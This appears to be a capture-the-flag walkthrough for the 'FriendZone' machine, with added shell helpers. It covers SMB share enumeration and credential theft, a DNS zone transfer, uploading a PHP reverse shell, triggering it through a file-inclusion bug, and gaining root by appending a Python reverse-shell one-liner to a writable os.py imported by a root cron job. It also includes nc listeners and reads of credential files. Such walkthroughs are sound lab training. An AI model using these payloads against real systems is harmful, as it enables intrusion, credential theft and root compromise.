Enum: standard nmap scan plus SMB share enumeration

nmap -sC -sV -O
nmap --script=smb-enum-shares 

Grab creds.txt from one of the enumerated shares

smbclient //
get creds.txt

Zone Transfer to find subdomains

dig axfr friendzone.red @

Add the subdomains the transfer returns to /etc/hosts, all on the target's IP:
friendzone.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red
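Added example (not part of the original notes): a small helper that turns the A records of the zone transfer into /etc/hosts lines. The zone name and hostnames come from the notes; the AXFR output below is constructed, and the target address 10.10.10.123 and the record values are placeholders.

```shell
#!/bin/sh
# Added example, not code from the original notes: turn the A records of a
# DNS zone transfer into /etc/hosts entries pointing at the target.
# Usage against the real box (placeholder address, not from the notes):
#   dig axfr friendzone.red @10.10.10.123 \
#     | axfr_to_hosts friendzone.red 10.10.10.123 | sudo tee -a /etc/hosts

# axfr_to_hosts ZONE TARGET_IP < dig-axfr-output
# For every A record whose owner name is ZONE or a subdomain of it,
# print "TARGET_IP name" once, with the trailing dot stripped.
# The address is taken from the argument, not from the record data,
# because a lab zone may point its records at 127.0.0.1.
axfr_to_hosts() {
    zone=$1
    ip=$2
    awk -v ip="$ip" -v zone="$zone" '
        $3 == "IN" && $4 == "A" && ($1 == (zone ".") || $1 ~ ("\\." zone "\\.$")) {
            name = $1
            sub(/\.$/, "", name)
            if (!seen[name]++) print ip, name
        }'
}

# Constructed sample of what "dig axfr friendzone.red @IP" returns.
# AXFR output repeats the SOA at the end, repeats names, and mixes in
# NS/AAAA records, all of which the function must ignore.
SAMPLE_AXFR='friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.		604800	IN	AAAA	::1
friendzone.red.		604800	IN	NS	localhost.
friendzone.red.		604800	IN	A	127.0.0.1
administrator1.friendzone.red.	604800	IN	A	127.0.0.1
hr.friendzone.red.	604800	IN	A	127.0.0.1
uploads.friendzone.red.	604800	IN	A	127.0.0.1
friendzone.red.		604800	IN	A	127.0.0.1
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800'

# Demo run with a placeholder target address.
printf '%s\n' "$SAMPLE_AXFR" | axfr_to_hosts friendzone.red 10.10.10.123
```

Pipe the real dig output through the function instead of the sample, and append the result to /etc/hosts with tee as shown in the comment.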

Log in on the administrator1 vhost with the credentials found in creds.txt

Upload the PHP reverse shell through SMB into the writable Development share

smbclient //
put r

Start a listener before triggering the shell

nc -lnvp 4455

Use the LFI in dashboard.php to include the uploaded file and trigger the reverse shell.
The earlier SMB share enumeration showed that the Development share is stored at /etc/Development on disk, so that is the path of the uploaded shell.


It is worth uploading a test file first, e.g. <?php phpinfo(); ?>, to confirm the include executes PHP before going for the reverse shell.

The vulnerable call in dashboard.php looks something like this: <?php include($_GET['pagename'] . ".php"); ?>
Because the code appends .php itself, the uploaded file must be named with a .php extension, but the pagename value must be given without it (pagename=/etc/Development/shell for a file called shell.php). Passing the extension as well makes PHP look for shell.php.php and the include fails.
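Added example (not from the original notes): a helper that builds the dashboard.php request from the uploaded filename and refuses names that would produce a doubled extension. The vhost, the /etc/Development path and the pagename parameter come from the notes; the https scheme, the cookie jar name cookies.txt and the assumption that pagename is the only parameter needed are mine.

```shell
#!/bin/sh
# Added example, not code from the original notes: build the dashboard.php
# LFI request so that the uploaded file's ".php" suffix is not doubled.
# Assumptions: https on the admin vhost, pagename is the only parameter
# needed, and the login session lives in cookies.txt.

ADMIN_HOST=administrator1.friendzone.red
SHARE_PATH=/etc/Development   # where the Development share lands on disk

# lfi_url FILENAME -> prints the URL whose include() resolves to FILENAME.
# include($_GET['pagename'].".php") appends the extension itself, so the
# uploaded file must be named *.php and the parameter must omit it.
lfi_url() {
    f=$1
    case $f in
        *.php) ;;
        *) echo "lfi_url: '$f' has no .php suffix; include() would look for $f.php" >&2
           return 1 ;;
    esac
    printf 'https://%s/dashboard.php?pagename=%s/%s\n' \
        "$ADMIN_HOST" "$SHARE_PATH" "${f%.php}"
}

# trigger FILENAME -> requests the include with the saved session cookie.
# -k: lab certificate is self-signed (assumption). Run this for the
# phpinfo() test file first, then for the reverse shell.
trigger() {
    url=$(lfi_url "$1") || return 1
    curl -sk -b cookies.txt "$url"
}

# Confirms code execution: phpinfo() output always contains "PHP Version".
check_phpinfo() {
    trigger "$1" | grep -q 'PHP Version'
}
```

Typical order: `trigger info.php` (or `check_phpinfo info.php`) while the listener is up does nothing harmful, then `trigger shell.php` connects back.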

Grab user: /home/friend/user.txt

Grab SSH creds from the MySQL config:

cat /var/www/htm/mysql_data.conf


ssh friend@

Watch for processes started by cron with pspy64:

2019/06/18 16:24:01 CMD: UID=0    PID=4059   | /bin/sh -c /opt/server_admin/reporter.py 
2019/06/18 16:24:01 CMD: UID=0    PID=4058   | /bin/sh -c /opt/server_admin/reporter.py 
2019/06/18 16:24:01 CMD: UID=0    PID=4057   | /usr/sbin/CRON -f 

Read reporter.py: it runs as root (UID=0) from cron and starts with import os, so whatever python loads for that module runs as root.

With ls -l we find that the file /usr/lib/python2.7/os.py is readable and writable by our user.

Append a python reverse shell to the end of os.py (fill in your own IP in the empty connect() host) and wait for cron to trigger it:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4488));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Have nc -lvnp 4488 listening before the next cron run, then grab root.txt from the root shell.